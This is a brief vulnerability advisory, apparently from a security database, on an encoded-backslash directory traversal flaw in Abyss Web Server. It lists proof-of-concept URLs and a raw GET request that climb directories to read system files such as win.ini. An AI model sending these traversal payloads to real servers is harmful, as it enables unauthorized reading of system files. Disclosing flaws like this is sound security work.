|
Abyss Web Server Encoded Backslash Directory Traversal Vulnerability
The following proof of concepts were provided by Auriemma Luigi <aluigi@pivx.com>: http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini "GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0" (using a Telnet client) http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/ http://host/%2f%2e%2e%2f http://host/%2f%2e%2e%2fcgi-bin/ |
|
|
Privacy Statement |